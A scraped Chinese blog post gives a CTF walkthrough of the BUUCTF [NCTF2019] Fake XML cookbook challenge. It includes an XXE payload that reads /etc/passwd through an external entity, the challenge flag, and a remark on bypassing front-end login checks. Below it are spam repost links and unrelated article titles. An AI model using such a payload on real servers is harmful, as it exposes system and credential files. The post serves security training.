当前位置: 首页 > news >正文

[NCTF2019]Fake XML cookbook

BUUCTF在线评测BUUCTF 是一个 CTF 竞赛和训练平台,为各位 CTF 选手提供真实赛题在线复现等服务。https://buuoj.cn/challenges#[NCTF2019]Fake%20XML%20cookbook启动靶机,一个登录页面

试了一下弱口令和万能密码,不行.

查看一下源码,发现可能存在xxe(xml外部实体注入)

抓包,尝试一下常见payload,传递一个外部实体DTD看看会不会被执行

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [<!ENTITY admin SYSTEM "file:///etc/passwd">
]>
<user><username>&admin;</username><password>root</password>
</user>

说明漏洞确实存在,修改一下payload,可以读取到flag{402098c9-0fd9-4c60-8ecd-5683c3931ccd}

=====================

题外话,在看代码的时候,发现code==0  表示登陆失败,code==1 表示登录成功。

某些时候,修改code的值,会自动跳转进入内部页面,从而达到登录绕过。

这种是通过前端来校验用户登录的,很弱,一般还是比较少见的


文章转载自:

http://0SyOJbNV.qkgwx.cn
http://30La4seV.qkgwx.cn
http://xir3BYaK.qkgwx.cn
http://xIixMahH.qkgwx.cn
http://ZhQSNF2e.qkgwx.cn
http://Y0pnKEOW.qkgwx.cn
http://Ok1xZ7Cs.qkgwx.cn
http://cEGfF5JV.qkgwx.cn
http://MZ2NVNVb.qkgwx.cn
http://QfFfzTDS.qkgwx.cn
http://J58diGOO.qkgwx.cn
http://ZqXeOZn2.qkgwx.cn
http://Pd7tDACK.qkgwx.cn
http://zMF8ANrt.qkgwx.cn
http://3S2EF6NZ.qkgwx.cn
http://zZAhtwYB.qkgwx.cn
http://V1RUCqS3.qkgwx.cn
http://zqI4Y8KG.qkgwx.cn
http://WXBvL6YI.qkgwx.cn
http://IlIM56cX.qkgwx.cn
http://JublSUn2.qkgwx.cn
http://y0s3IToZ.qkgwx.cn
http://tz3rKaJx.qkgwx.cn
http://fIXhsekz.qkgwx.cn
http://PJilO7IX.qkgwx.cn
http://qegXzM5O.qkgwx.cn
http://20qAlWVh.qkgwx.cn
http://v78vF9PC.qkgwx.cn
http://WiAiCQIT.qkgwx.cn
http://mNWvgwR2.qkgwx.cn
http://www.dtcms.com/a/371525.html

相关文章:

  • ARM体系结构学习②
  • 多环境配置切换机制能否让开发与生产无缝衔接?
  • SC3336 rgb sensor linux
  • 人工智能学习:Transformer架构
  • Android --- AOSP源码导入Android Studio
  • 华为HCIP-Datacom-Core Technology H12-831 书籍目录
  • (RDFS)随机深度特征选择方法解释:简而言之,RDFS主要针对的是恶意的服务器,它建立在客户端是诚实的前提下。
  • 《从使用到源码:OkHttp3责任链模式剖析》
  • 华为IP(9)
  • 【秋招笔试】2025.09.03华为研发岗
  • 动态维护有效区间:单调栈
  • Ubuntu 22 安装 postgresql-17.4
  • Linux环境下配置visual code
  • 考研复习-计算机网络-第三章-数据链路层
  • OpenHarmony之SELinux安全组件底层原理设计架构精讲
  • 【机器学习】综合实训(二)
  • 大坝安全监测中的单北斗GNSS变形监测系统应用解析
  • Redis复制延迟全解析:从毫秒到秒级的优化实战指南
  • Ansible题目全解析与答案
  • 深入解析 Java 内存可见性问题:从现象到 volatile 解决方案
  • 【工具变量】地级市中小企业数字化转型月度DID数据集(2022.1-2025.7)
  • platform_ops_t 结构体在兼容性设计中的应用
  • HashSet、LinkedHashSet详解
  • 大语言模型注意力机制(Attention Mechanism)
  • 【Redis】常用数据结构之Hash篇:从常用命令到使用场景详解
  • 去中心化投票系统开发教程 第四章:前端开发与用户界面
  • 使用csi-driver-nfs实现K8S动态供给
  • linux内核 - 获取内核日志时间戳的方法
  • 从0到1学习Vue框架Day01
  • K8S-Pod(下)